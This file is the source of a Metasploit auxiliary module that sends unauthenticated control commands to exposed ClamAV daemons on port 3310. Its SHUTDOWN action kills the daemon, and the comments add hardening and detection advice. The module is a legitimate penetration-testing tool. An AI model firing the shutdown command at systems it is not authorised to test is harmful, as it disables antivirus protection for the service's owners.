rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/scanner/misc/clamav_control.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
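# Auxiliary scanner that sends one clamd control command (the selected action
# name, newline-terminated) to a ClamAV daemon reachable over TCP and prints
# whatever the daemon answers.
#
# The exposure involved is a configuration one: per the module description,
# clamd in some configurations binds to all addresses. The code below performs
# no authentication step before sending the command, so any host that can
# reach the port can issue it.
#
# Defensive notes: keep clamd on a local socket (clamd.conf `LocalSocket`) or
# bind its TCP listener to loopback (`TCPAddr`), and filter the clamd port
# (3310/tcp is the default used here) at the host firewall. Inbound
# connections to that port from hosts that are not known scanning clients are
# worth alerting on.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Scanner

  # Registers module metadata, the two supported actions and the default port.
  #
  # @param info [Hash] metadata overrides merged in by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ClamAV Remote Command Transmitter',
        'Description' => %q{
          In certain configurations, ClamAV will bind to all addresses and listen for commands.
          This module sends properly-formatted commands to the ClamAV daemon if it is in such a
          configuration.
        },
        'Author' => [
          'Alejandro Hdeza', # DISCOVER
          'bwatters-r7', # MODULE
          'wvu' # GUIDANCE
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'URL', 'https://twitter.com/nitr0usmx/status/740673507684679680/photo/1' ],
          [ 'URL', 'https://github.com/vrtadmin/clamav-faq/raw/master/manual/clamdoc.pdf' ]
        ],
        'DisclosureDate' => '2016-06-08',
        'Actions' => [
          [ 'VERSION', 'Description' => 'Get Version Information' ],
          [ 'SHUTDOWN', 'Description' => 'Kills ClamAV Daemon' ]
        ],
        'DefaultAction' => 'VERSION',
        # NOTE(review): the SHUTDOWN action stops the daemon, so these
        # UNKNOWN_* placeholders understate the availability impact; confirm
        # and replace them with explicit stability / side-effect values.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
    register_options(
      [
        Opt::RPORT(3310)
      ], self.class
    )
  end

  # Sends the selected action to one host and reports the daemon's answer.
  #
  # A closed connection (EOFError) is reported as a successful shutdown only
  # when the SHUTDOWN action was actually selected; for any other action it
  # is reported as an error, because no response was obtained. An empty or
  # missing response is likewise reported as an error rather than as a blank
  # success line.
  #
  # @param _ip [String] target address supplied by the scanner mixin (unused;
  #   connect reads the target from the datastore)
  # @return [void]
  def run_host(_ip)
    connect
    sock.put("#{action.name}\n")

    # get_once may hand back nil when nothing arrives before the read timeout.
    response = sock.get_once
    if response.to_s.empty?
      print_error("No response received for #{action.name}")
    else
      print_good(response)
    end
  rescue EOFError
    if action.name == 'SHUTDOWN'
      print_good('Successfully shut down ClamAV Service')
    else
      print_error("Connection closed before a #{action.name} response was received")
    end
  ensure
    # Always release the socket, whether the exchange succeeded or not.
    disconnect
  end
end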